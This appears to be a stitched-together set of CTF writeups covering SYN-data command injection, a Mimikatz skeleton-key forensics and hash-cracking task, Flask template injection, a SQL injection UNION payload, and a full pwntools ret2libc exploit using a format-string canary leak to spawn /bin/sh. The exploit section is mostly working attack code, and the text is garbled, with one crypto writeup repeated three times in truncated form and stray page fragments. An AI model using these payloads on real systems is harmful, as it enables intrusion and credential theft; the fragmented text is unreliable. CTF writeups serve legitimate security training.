cd FakeSSHcp ./data/config.sample.json ./data/config.jsonssh-keygen -f ./data/rsa -m 'PEM' set no password
sudo python3 server.py
wait max 10min
ssh -l svc-tenable-linux 10.13.37.99password = $\mx3i#u0@%6d@8fk^&^x*ntw2m
# Net1
it is supposed to happen between port TCP3000-4000a quick : nmap -Pn -p 3000-4000 10.13.37.99
Hint 2 : RFC741x => RFC7413 = Use TCP SYN Data
ok, Let's try some Python Scapy with TCP-Syn Data
Trying to send some commands but nothing back from the server.
Hint : We got the password "SyN" at 1am
Ok, let's send some commandsmain(SyN ls -la)....final command : main(SyN cat ./secret/me/not/flag.txt)
to find flag 
# mybrokenbash
nc server 1337 Let's send the command **cat flag** but we get cat flag in return ok so maybe stdout is closed but **cat flag 2>&1** doesn't work either so maybe stderr is also closed let's redirect stdout to stdin **cat flag 1>&0** We are on the good track but we are missing something still. The file had a carriage return (\r), and only the end of the file was sent back One had to find/know that cat has options. ** cat -A** = show-allFinal command to show the flag was ** cat -A flag 1>&0**
# Skeleton in the closet
https://download.scrt.ch/insomnihack2019/SiC_8b47589556efae17471bbb768e25b525.zip
After searching a bit, we found the reference of the Skeleton Misc function of the well known Mimikatz of Benjamin Delpy.https://github.com/gentilkiwi/mimikatz We find from the documentation, this function will somehow patch the LSASS process and adds a super password which will work for any username used ! By default, the password is : **mimikatz** The NTLM hash of mimikatz is : 
We can see from the source code of mimikatz this NTML password in little endian format.
The definition of the chall, is that a personalized version of mimikatz has been used. So we need to find the password which has been encoded in his customized version.
We download the memory dump file and analyse it with Volatility.
**python vol.py -f memory.vmem imageinfo.** To find the OS. 
**python vol.py -f memory.vmem --profile=Win2016x64_14393 pslist.** To find the process running. 
**python vol.py -f memory.vmem --profile=Win2016x64_14393 -p 588 memdump -D ./dump.**
Now we need to find how this alteration of this skeleton function has left traces in the memory. To find this, we use a standard Domain Controller and apply the function with the original version of Mimikatz. **mimikatz** **privilege::debug** **misc::skeleton**
After dumping the memory of the lsass process, let's analyse how the original mimikatz has writen the NTLM hash in the memory. We can use many tools, but here we use **hexedit lsass_post.DMP** And search for out hash starting with **60ba4f** (Ctrl-S)We can see the NTLM hash with a structure around it **C7 44 24 xx** between each part. (In blue the hash, orange the repeated pattern). 
Great, let's do the same on the dumped memory from Volatility and search for this pattern **C7 44 24**
The NTLM hash to crack is 65FB3480 14C7B62A 100AF97E EC0B6221 And we know from the chall definition that it is **INS{xxxxxxx}** (7 chars to find)
Let's bruteforce the hash: John:**john --format=nt -mask=INS{?1?1?1?1?1?1?1} -1=?l?u?d ./myhash.txt** Hashcat: **hashcat64 --session skeleton hash.txt -m 1000 -a 3 INS{?1?1?1?1?1?1?1} -1 ?l?u?d**
|
# Big Bad
English version coming soon
## Task
[BigBad](./src/BigBad.png)
## Solution
Открываем картинку:
Тут какое-то дерево. Внимательно читая задание, замечаем слово HUFF. Похоже, нам намекают на [кодирование методом Хаффмана](https://en.wikipedia.org/wiki/Huffman_coding). Только у нас нет данных, которые надо декодировать.
Поискать эти данные я решил внутри картинки. Открываем её Stegsolve'ом и находим вот такую штуку:
Так, на что это похоже? Может штрих-код? После некоторых несложных манипуляций я получил вот такую картинку:
Здесь красные точки я поставил для того, чтобы было легче посчитать ширину линий. Теперь всё это переводим в нули и единицы следующим образом:
1) Ширина самой тонкой линии берется за эталонную ширину одного символа.
2) Чёрные полоски - это 0, белые - это 1
То есть первая черная полоска будет равна 00000, потому что её ширина равна 5 эталонным. Далее идёт 1, потом 0 и т.д. Декодируя таким образом весь штрих-код получаем такую строку:
`0000010100101101000010011010001010100011010101001100101000101100110001110111111001100111011111000000111100010010110011001111101010001100011111011`
Теперь, используя дерево на картинке, декодируем флаг в соответствии с правилами [кодирования Хаффмана](https://en.wikipedia.org/wiki/Huffman_coding) и получаем следующую строку: `sun{sh0ulda_u5ed_br1cks_1001130519}` |
# Portfolio## This is a Server Side Template Injection Challenge.
URL = `http://folio.sunshinectf.org/`
Given link contains a page with two links. - Custom greeting - Dynamic page rendering
If we go to Custom greeting [http://folio.sunshinectf.org/hello/name] which has `Hello name! Welcome to world of Flask.`, which tells us that it is a python flask server. If we change the name to some other name like `http://folio.sunshinectf.org/hello/Ak` we get `Hello Ak! Welcome to world of Flask.` which means the last part of the url is kept in the source code.
Hmm.. Now I tried to give `http://folio.sunshinectf.org/hello/{{7*7}}` and hope it would give `Hello 49!`, But no use :(
Then I went to Dynamic page rendering [http://folio.sunshinectf.org/render.html] which has a form which posts data `template=/template/matches.html` and `template=/template/teams.html` and we can also access `template=/template/admin.html`.
But visiting these sites is of no use. If we visit `admin.html` we can see `{% if config.DEBUG %} {{config.FLAG}} {% endif %} Hi there!` But if we post that as value to template in render, we can see the `{{}}` parts are evaluated. And the flag is in the properties of config variable.
Now I tried to send `/hello/{{7*7}}` as value of template to render.html and it worked and returned `Hello 49! Welcome to world of Flask.`. Now I tried to print the properties of config variable and it contains the flag.
Flag is sun{5l33333p_15_f0r_7h3_w34k} |
```bashgdb patches
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1(gdb) disassemble mainDump of assembler code for function main: 0x0000051d <+0>: lea 0x4(%esp),%ecx 0x00000521 <+4>: and $0xfffffff0,%esp 0x00000524 <+7>: pushl -0x4(%ecx) 0x00000527 <+10>: push %ebp 0x00000528 <+11>: mov %esp,%ebp 0x0000052a <+13>: push %ebx 0x0000052b <+14>: push %ecx 0x0000052c <+15>: sub $0x10,%esp 0x0000052f <+18>: call 0x5c6 <__x86.get_pc_thunk.ax> 0x00000534 <+23>: add $0x1aa4,%eax 0x00000539 <+28>: movl $0x1,-0x10(%ebp) 0x00000540 <+35>: cmpl $0x0,-0x10(%ebp) 0x00000544 <+39>: jne 0x5a3 <main+134> 0x00000546 <+41>: movl $0x0,-0xc(%ebp) 0x0000054d <+48>: jmp 0x580 <main+99> 0x0000054f <+50>: lea 0xc8(%eax),%ecx 0x00000555 <+56>: mov -0xc(%ebp),%edx 0x00000558 <+59>: add %ecx,%edx 0x0000055a <+61>: movzbl (%edx),%edx 0x0000055d <+64>: mov %edx,%ecx 0x0000055f <+66>: mov -0xc(%ebp),%edx 0x00000562 <+69>: mov 0x48(%eax,%edx,4),%edx 0x00000569 <+76>: sub %edx,%ecx 0x0000056b <+78>: mov %ecx,%edx 0x0000056d <+80>: mov %edx,%ebx 0x0000056f <+82>: lea 0xc8(%eax),%ecx 0x00000575 <+88>: mov -0xc(%ebp),%edx 0x00000578 <+91>: add %ecx,%edx 0x0000057a <+93>: mov %bl,(%edx) 0x0000057c <+95>: addl $0x1,-0xc(%ebp) 0x00000580 <+99>: cmpl $0x1e,-0xc(%ebp) 0x00000584 <+103>: jle 0x54f <main+50> 0x00000586 <+105>: sub $0x8,%esp 0x00000589 <+108>: lea 0xc8(%eax),%edx 0x0000058f <+114>: push %edx 0x00000590 <+115>: lea -0x1988(%eax),%edx 0x00000596 <+121>: push %edx 0x00000597 <+122>: mov %eax,%ebx 0x00000599 <+124>: call 0x3b0 <printf@plt> 0x0000059e <+129>: add $0x10,%esp 0x000005a1 <+132>: jmp 0x5b7 <main+154> 0x000005a3 <+134>: sub $0xc,%esp 0x000005a6 <+137>: lea -0x1970(%eax),%edx 0x000005ac <+143>: push %edx 0x000005ad <+144>: mov %eax,%ebx 0x000005af <+146>: call 0x3b0 <printf@plt> 0x000005b4 <+151>: add $0x10,%esp 0x000005b7 <+154>: mov $0x0,%eax 0x000005bc <+159>: lea -0x8(%ebp),%esp 0x000005bf <+162>: pop %ecx 0x000005c0 <+163>: pop %ebx 0x000005c1 <+164>: pop %ebp 0x000005c2 <+165>: lea -0x4(%ecx),%esp 0x000005c5 <+168>: ret End of assembler dump.(gdb) b *main+39Ponto de parada 1 at 0x544(gdb) rStarting program: /home/andersongomes001/patches
Breakpoint 1, 0x56555544 in main ()(gdb) jump *main+41Continuando em 0x56555546.Hurray the flag is sun{To0HotToHanDleTo0C0ldToH0ld!}[Inferior 1 (process 10863) exited normally](gdb) q```flag => sun{To0HotToHanDleTo0C0ldToH0ld!} |
# Sunshine CTF 2019 All Crypto Challenges Writeups# Welcome Crypto [50]
Here's the challenge
```~C8 =39 A?2V8 73J:C 8FG7 AF?JJC2ECP
DF?LHb=r_>b0%_0520 |
# Sunshine CTF 2019 All Crypto Challenges Writeups# Welcome Crypto [50]
Here's the challenge
```~C8 =39 A?2V8 73J:C 8FG7 AF?JJC2ECP
DF?LHb=r_>b0%_0520 |
# Sunshine CTF 2019 All Crypto Challenges Writeups# Welcome Crypto [50]
Here's the challenge
```~C8 =39 A?2V8 73J:C 8FG7 AF?JJC2ECP
DF?LHb=r_>b0%_0520 |
**PLEASE READ THE OTHER WRITEUPS, THEY ARE MUTCH BETTER.**
This was posted out of frustration I finished the task 30 minutes after the ctf was closed. (I though I had 30 more minuts to go.) I had some problems with cookies. I realize now I forgot to make a session for requests.
the code below is a mess made by a verry tired madman trying to win a race against the clockand get his session cookie updated, copying and pasting code..
```from PIL import Image, ImageDrawimport requestsimport logging
import cookielib# These two lines enable debugging at httplib level (requests->urllib3->http.client)# You will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.# The only thing missing will be the response.body which is not logged.try: import http.client as http_clientexcept ImportError: # Python 2 import httplib as http_clienthttp_client.HTTPConnection.debuglevel = 0
# You must initialize logging, otherwise you'll not see debug output.logging.basicConfig()logging.getLogger().setLevel(logging.DEBUG)requests_log = logging.getLogger("requests.packages.urllib3")requests_log.setLevel(logging.DEBUG)requests_log.propagate = Trueshit = ""
'''--==------------------=================-----------========================'''#target = "http://ee.sunshinectf.org/practice"target = "http://ee.sunshinectf.org/exam"filename = 'test.png'ses =""size = 55 #size of the dot
#######################x axisa = 335b = 404c = 472d = 541e = 607offset = 487 # offset for second colmn
######################### built an list with y axisy = [435]for i in range (0,9): y.append(y[i]+90)y= [0]+y+y # dubble up and sync up wiht anwser number :P'''--==------------------=================-----------========================'''
jar = cookielib.CookieJar()#function to draw a dot on the disired place.def awnser(qnr, awn,dr): if qnr > 10: awn = awn+offset dr.ellipse((awn, y[qnr], awn+size, y[qnr]+size), fill = 'black', outline ='black')
'''--==------------------=================-----------========================'''
######################################### Open up the awnser sheetdef make_file(winrar,num): im = Image.open('scantron.png') im.load() dr = ImageDraw.Draw(im) for i in range(1,21): awnser(i,winrar[i-1],dr) im.save(str(num)+filename)
while 1: r = requests.get(target,cookies=jar) cookies = r.cookies.get_dict() shit = cookies['session'] test = r.text count =0 while 1: quests = [] aS=[] bS=[] cS=[] dS=[] eS=[] ret=[] print aS print quests for i in range(0,20): question = test[test.index("")+4:test.index("")] quests.append(question) test = test[test.index("")+5:] aS.append(test[test.index("")+4:test.index("")]) test = test[test.index("")+5:] bS.append(test[test.index("")+4:test.index("")]) test = test[test.index("")+5:] cS.append(test[test.index("")+4:test.index("")]) test = test[test.index("")+5:] dS.append(test[test.index("")+4:test.index("")]) test = test[test.index("")+5:]
i = 0 for x in quests: print x tmp = str(eval(x)) #braking all the rules of commencense if tmp == aS[i]: ret.append(a) if tmp == bS[i]: ret.append(b) if tmp == cS[i]: ret.append(c) if tmp == dS[i]: ret.append(d) i=i+1 print ret
make_file(ret,count)
files = {'file': open(str(count)+filename,'rb')} fuck = dict(session=shit) r = requests.post(target, files=files, cookies=fuck) test = r.text print test cookies = r.cookies.get_dict() shit = cookies['session'] count += 1 if "Wrong" in test: print "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFUUUUUUUUUUUUUUUUUUUUUUUUUUUUCCCCCCCCCCCCCCCCCCCCCCCCCCCCKKKKKKKKKKK" break
'''--==------------------=================-----------========================better late than neversun{7h3_b357_7h3r3_15_7h3_b357_7h3r3_w45_7h3_b357_7h3r3_3v3r_w1ll_b3}'''``` |
This writeup is based on Naivenom's writeup from the CTF which can be found [here](https://naivenom.tistory.com/19).
I did not solve this problem during the duration of the CTF but found it to be a good opportunity to write a detailed explanation about how I solved it.
-----
## 0. Some pre-requisites:
- It's nice to have gdb-peda and pwntools.- Knowledge on buffer overflow and ret2libc. - Knowledge of 64-bit environments and its difference from 32-bit environments (optional)- "scanf will quite happily read null bytes. it only stops at white space - strcpy/strcat are the functions you should worry about null bytes" -brx (This means we don't have to worry about the canary having null bytes)
P.S: How to set ASLR on on gdb (turns off every instance):```set disable-randomization off```
-----
## 1. Examining the program
When we boot up the program, we can clearly see the program has a format string bug:
```chanbin_lee123@linux:~$ ./armoury*******Rifle Database**************
Enter the name of Rifle to get info:%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
----------------DATA-------------------
0x7fa5447c5683.0x7fa5447c6760.0x7fa544506970.0x7fa5449e7440.(nil).0x1.0x1dbcdbced.0x252e70252e702500.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0xc8316ab63d007025.0x5622dbcdbca0:
Sorry... We dont have any information about %p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
---------------------------------------
Enter the name of Rifle to get info:
^C```
As per the output text, we can see that there are some addresses leaking (we will observe this later), and then further, the material in the stack. We can observe that the stack information is leaked from the 9th argument (after 9 "%p"s).
Let's check the security on the program.
```chanbin_lee123@linux:~$ gdb -q armouryReading symbols from armoury...(no debugging symbols found)...done.gdb-peda$ checksec
CANARY : ENABLED FORTIFY : disabledNX : ENABLEDPIE : ENABLEDRELRO : FULL```
- **Canary (Stack Smashing Protector, Cookie):** A null-byte terminated string that is located before the saved stack frame pointer (RBP) and return address (RET). This is a value that the program compares to its original value (stack_chk_fail) before it returns. If this value is overwritten because of a buffer overflow vulnerability, the program will realize that it will not be safe to continue and will terminate the program.
- **NX ( Non-executable):** - you will not be able to execute any kind of shellcode by placing them on the stack. (Stack is declared as non-executable.)
- **ELF:** Executables and Linkable Format (basically the program you're running right now.)
- **PIE:** Position Independent Executable - All the sections of the program are randomly loaded into memory. (This includes the .data and .code section of the program). But, since the PIE only changes the executable's base address, you will be able to see that if you execute the command "objdump -d [ELF executable]" the output will only give offsets. And these offsets stay the same every run! Only the base address of your program will change, meaning that as long as you have the offsets and a base address to add from, you'll be able to call what you want.
- **ASLR (non-PIE):** Changes the position of stack, heap, library (but the main executable will get loaded in the same address.)
- **RELRO (RELocation Read-Only):** Basically a full RELRO means that you won't be able to do anything like a GOT overwrite because the GOT will be read-only. ELF binaries that are dynamically linked refer to the GOT and PLT; when you call a function, the function will refer to the PLT - the PLT includes dynamic jumps which point directly to GOT. The GOT loads addresses from the PLT (through a linker) when the function is first called. Read up more on: [RELRO](https://medium.com/@HockeyInJune/relro-relocation-read-only-c8d0933faef3)
-----
## 2. Gathering materials
What we need:- Leaked canary- Gadget (pop rdi; ret)- Three libc addresses: - base of libc - (offset to) system() - (offset to) "/bin/sh"
### 2.1. Getting the Canary
So, we already know from the first format string bug, that we are able to access information on the stack.I first put a breakpoint in main (using the `b *main` command) and ran the program, giving "BBBB" as the input. At the breakpoint, we can investigate the value of `$rsp` to see what we have.
As you may observe, we have BBBB (0x42424242) on the stack. We can also see the canary (ending with a null byte), the saved RBP, and return address, all highlighted above.
The canary is located right before the stack frame pointer. As we know that the stack is leaked after 9 %ps, we can conclude that the canary is the 13th argument, the sfp is 14th, and the return address is the 15th argument we can receive from our format string.
### 2.2. Getting the ELF base address
When we observe the saved RBP (from the previous screenshot above), we can see that if we null the last three bytes out, we will be able to get the base ELF address. This will be useful to us when we obtain our gadget as offsets from the base address.
### 2.3. Getting the LIBC base address
Breakpoint at giveInfo to set a stop, so that we can observe the registers and addresses. (`b giveInfo`)Run the program. (`r`)
There we can see the address we get from executing `scanf("%3$p");` (third argument of the output)
If we take a look at our third argument that gets leaked, we can use that leaked address to get the offset to our libc as shown above. We need to grab a few more values too.
```gdb-peda$ p 0x7ffff7b15970-0x00007ffff7a3a000 $1 = 0xdb970
gdb-peda$ p system$2 = {<text variable, no debug info>} 0x7ffff7a79480 <__libc_system>
gdb-peda$ p 0x7ffff7a79480 -0x00007ffff7a3a000 $3 = 0x3f480```
We see that: - `%3$p`: Address of `<__write_nocancel+7>` - Offset to libc: `0xdb970` - Offset from libc to system: `0x3f480` - Hence: `%3$p` - offset to libc + offset from libc to system = address of system (in libc)
### 2.4. Address of "/bin/sh"
```gdb-peda$ find "/bin/sh"Searching for '/bin/sh' in: None rangesFound 1 results, display max 1 items:libc : 0x7ffff7b9bc19 --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$ p 0x7ffff7b9bc19 -0x00007ffff7a3a000 $4 = 0x161c19```
### 2.5. ROP Gadgets (pop rdi; ret)
```chanbin_lee123@instance-2:~$ ROPgadget --binary armouryGadgets information============================================================0x0000000000000d03 : pop rdi ; ret```
-----
## 3. POC```BUFFER [24]CANARY [8]DUMMY [8]POP RDI; RET [8]ADDRESS OF "/BIN/SH" [8]ADDRESS OF SYSTEM() [8]```(Basic ret2libc structure in a 64-bit environment)
-----
## 4. Exploit Rundown
Full exploit can be found in the next section.
I'll try my best to explain everything.. So please ask if you don't understand something written here.
```payload = "" r.recvuntil("Enter the name of Rifle to get info:\n")r.send("%3$p.%13$p.%14$p\n") # libc address, canary, saved rbp```↑ We want the 3rd, 13th and 14th arguments so we leak those.
```leak = r.recvuntil(":").replace(":", "").split(".")leaked_libc = int(leak[0], 16) offset_to_libc = 0xdb970offset_to_system = 0x3f480offset_to_binsh = 0x161c19```↑ Once we receive the leaks, we split the string regarding '.'
- leak[0] = 3rd argument- leak[1] = canary- leak[2] = sfp
I also save the offsets I have.
```libc_addr = leaked_libc - offset_to_libcsystem_addr = libc_addr + offset_to_systembinsh_addr = libc_addr + offset_to_binsh```↑ Calculate all the addresses I need using the offsets. If any of these calculations don't make sense, refer back to section 2.3 - I've explained a little bit there.
```canary = int(leak[1], 16)leaked_elf = int(leak[2], 16)elf_addr = leaked_elf - (leaked_elf & 0xfff)
offset_pop_rdi = 0xd03pop_rdi = elf_addr + offset_pop_rdi```↑ I also cast the canary to int here, and calculate the ELF base address.
If you do a &0xfff operation, you get the last three bytes of a number - so we can just subtract this from the original address and we get the base address.
```payload += "A"*24 # Fill up the bufferpayload += p64(canary) # Canarypayload += "B"*8 # Overwrite saved RBPpayload += p64(pop_rdi)payload += p64(binsh_addr)payload += p64(system_addr)payload += "\n"```
As written above (POC) this is the generic ret2libc payload.
Since the argument to system() is passed on through RDI, we load the address of /bin/sh on RDI (using pop rdi) and call system().
-----
## 5. Full Exploit```from pwn import * r = process("./armoury") payload = "" r.recvuntil("Enter the name of Rifle to get info:\n")r.send("%3$p.%13$p.%14$p\n") # libc address, canary, saved rbp r.recvuntil("----------------DATA-------------------\n") leak = r.recvuntil(":").replace(":", "").split(".")leaked_libc = int(leak[0], 16) offset_to_libc = 0xdb970offset_to_system = 0x3f480offset_to_binsh = 0x161c19 libc_addr = leaked_libc - offset_to_libcsystem_addr = libc_addr + offset_to_systembinsh_addr = libc_addr + offset_to_binsh print "libc address: " + hex(libc_addr)print "system address: " + hex(system_addr)print "binsh address: " + hex(binsh_addr) canary = int(leak[1], 16)leaked_elf = int(leak[2], 16)elf_addr = leaked_elf - (leaked_elf & 0xfff) print "canary: " + hex(canary)print "elf address: " + hex(elf_addr) offset_pop_rdi = 0xd03pop_rdi = elf_addr + offset_pop_rdi payload += "A"*24 # Fill up the bufferpayload += p64(canary) # Canarypayload += "B"*8 # Overwrite saved RBPpayload += p64(pop_rdi)payload += p64(binsh_addr)payload += p64(system_addr)payload += "\n" r.recvuntil("Enter the name of Rifle to get info:\n")r.send("AAAA\n") r.recvuntil("Would you like to give us some feedback:\n")r.send(payload) r.interactive()``` |
# Securinets Prequals CTF 2019 – SQL Injected
* **Category:** Web* **Points:** 984
## Challenge
> Task url: https://web5.ctfsecurinets.com > > You can download the source code [here](https://github.com/m3ssap0/CTF-Writeups/tree/master/Securinets%20Prequals%20CTF%202019/SQL%20Injected/public)> > Author: Oussama> > ps: i don't like the task's name
## Solution
The target is to connect to `https://web5.ctfsecurinets.com/flags.php` with a user having the proper `role` value (i.e. `1`).
Analyzing the source files, a code vulnerable to SQL injection can be spotted into `index.php`.
```php$sql = "SELECT * FROM posts WHERE author = '". $_SESSION['username'] ."'";```
The username taken from the session is not properly sanitized. This vulnerability could be triggered via the own username after the authentication.
The database is like the following (based on `create_db.sql`).
```sqlcreate database webn;create table users (id int auto_increment primary key, login varchar(100), password varchar(100), role boolean default 0);create table posts (id int auto_increment primary key, title varchar(50), content text, date Date, author varchar(100));```
So, a possible malicious input for the username, in order to print the details of the user with the proper role, is the following.
```sql' UNION SELECT id, login, password, NULL, NULL FROM users WHERE role = 1 AND '' = '```
A user with this value for the username must be registered. After the first automatic login, the SQL injection will not have effect: you have to logout and re-login in order to find the details of the searched user under the post search section.
```rootjjLLgTGk3uif2rKBVwqH```
Logging in with that user and connecting to `https://web5.ctfsecurinets.com/flags.php` will print the flag.
```Securinets{5VuCj0JUr43jwQDpncRA}``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.